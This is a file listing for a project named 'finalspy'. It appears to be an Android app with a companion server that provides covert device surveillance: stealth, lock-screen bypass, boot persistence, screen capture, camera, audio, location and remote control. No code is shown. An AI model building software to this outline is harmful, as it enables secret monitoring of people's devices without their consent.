# finalspy

./: ADVANCED_SETUP_GUIDE.md  DEPLOYMENT_GUIDE.md  README.md  RemoteControlAPI.md  gradle.properties  settings.gradle  setup_permissions.bat
app/: build.gradle
app/src/main/: AndroidManifest.xml
app/src/main/java/com/example/myapplication/: App.java  PermissionSetupActivity.java  SharingActivity.java
app/src/main/java/com/example/myapplication/admin/: DeviceOwnerManager.java  DeviceOwnerReceiver.java
app/src/main/java/com/example/myapplication/receivers/: BootReceiver.java
app/src/main/java/com/example/myapplication/services/: LockScreenBypassService.java  PersistentService.java  ScreenCaptureService.java
app/src/main/java/com/example/myapplication/utils/: AudioManager.java  CameraManager.java  Constants.java  LocationHelper.java  LocationManager.java  PermissionManager.java  RemoteControlManager.java  ScreenCaptureManager.java  ScreenshotManager.java  SocketManager.java  StealthManager.java
app/src/main/res/drawable/: ic_transparent.xml
app/src/main/res/layout/: activity_permission_setup.xml  activity_sharing.xml
gradle/wrapper/: gradle-wrapper.properties
server/: README.md  package.json  server.js
server/public/: index.html
